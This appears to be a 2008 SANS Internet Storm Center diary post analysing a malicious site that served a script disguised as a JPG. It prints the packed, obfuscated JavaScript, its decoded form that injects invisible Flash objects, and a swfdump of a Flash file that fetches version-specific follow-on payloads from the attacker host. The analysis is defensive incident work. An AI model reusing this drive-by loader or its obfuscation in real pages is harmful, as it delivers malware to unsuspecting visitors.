Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Malicious swf files? SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms: https://isctv.sans.edu

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Malicious swf files?

Marco and Eric wrote in to let us know of a potentially malicious site found at

hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.jpg

The JPG file is actually a script, shown below:

window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':
e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace
(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);2.q="i=K;J=/;5="+5.I();n(L.y.t().k("s")>0){2.3(\'<r
A="z:u-x-v-w-H" Y="6://15.14.9/13/10/11/17/18.M#1a=4,0,19,0" l="0" m="0"
16="Z">\');2.3(\'<8 7="R" a="Q"/>\');2.3(\'<8 7="P" a="6://g.h.9/e/f/d/b/p.
c"/>\');2.3(\'<8 7="N" a="O"/>\');2.3(\'<8 7="S" a="#T"/>\');2.3(\'<X o="
6://g.h.9/e/f/d/b/p.c"/>\');2.3(\'</r>\')}W{2.3("<V o=6://g.h.9/e/f/d/b/U.c l=0 m=0>")}}',62,73,'||document|write||expires|http|name|param|com|value|
20080311cPxl31|swf|ff11us|pcd|topics|www|play0nlnie|playon|60|indexOf|
width|height|if|src|07|cookie|object|msie|toLowerCase|d27cdb6e|11cf|96b8|ae6d|
userAgent|clsid|classid|1000|setTime|Date|var|new|getTime|444553540000|
toGMTString|path|Yes|navigator|cab|quality|high|movie|sameDomain|allowScriptAccess
|bgcolor|ffffff|08|EMBED|else|embed|codebase|middle|shockwave|cabs||pub|macromedia
|download|align|flash|swflash||version'.split('|'),0,{}))

Using spidermonkey, it decodes to:

if(document.cookie.indexOf("playon=")==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);
document.cookie="playon=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0){document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0"
width="0" height="0" align="middle">');document.write('<param name="allowScriptAccess" value="sameDomain"/>');document.write('<param name="movie" value="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
document.write('</object>')}else{document.write
("<EMBED src=hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/08.swf width=0 height=0>")}}

Lets get the swf files and see what they do, wget works.
file 07.swf
07.swf: Macromedia Flash data (compressed), version 9
file 08.swf
08.swf: Macromedia Flash data (compressed), version 9

Virustotal shows 0/32 for both files.

Swftools can show us what the swf files do:
swfdump -D 08.swf
[HEADER]        File version: 9
[HEADER]        File is zlib compressed. Ratio: 96%
[HEADER]        File size: 208 (Depacked)
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 1.00
[HEADER]        Movie height: 1.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c00c]       138 DOACTION
                 (   99 bytes) action: Constantpool(5 entries)
String:"flashVersion" String:"/:$version"
String:"http://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/"
String:"ff.swf" String:"_root"
                 (    4 bytes) action: Push Lookup:0 ("flashVersion") Lookup:1 ("/:$version")
                 (    0 bytes) action: GetVariable
                 (    0 bytes) action: DefineLocal
                 (    4 bytes) action: Push Lookup:2
("http://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/")
Lookup:0 ("flashVersion")
                 (    0 bytes) action: GetVariable
                 (    0 bytes) action: Add2
                 (    2 bytes) action: Push Lookup:3 ("ff.swf")
                 (    0 bytes) action: Add2
                 (    2 bytes) action: Push Lookup:4 ("_root")
                 (    0 bytes) action: GetVariable
                 (    1 bytes) action: GetUrl2 64
                 (    0 bytes) action: Stop
                 (    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

Running the swf files in a web browser gives me the following URLs:
hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/WIN%206,0,79,0ff.swf
and
hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/WIN%206,0,79,0ie.swf
Both of which got me a big fat 404.
Either the final files have been removed, or are looking for a different version of the player.

Thanks to Bojan and Jeremy for their help!

Unknown at this time if these SWF files are related to this vulnerability.

Cheers,
Adrien de Beaupre
Bell Canada

 Adrien de Beaupre

353 Posts
ISC Handler
Subscribe May 27th 2008
1 decade ago

Sign Up for Free or Log In to start participating in the conversation!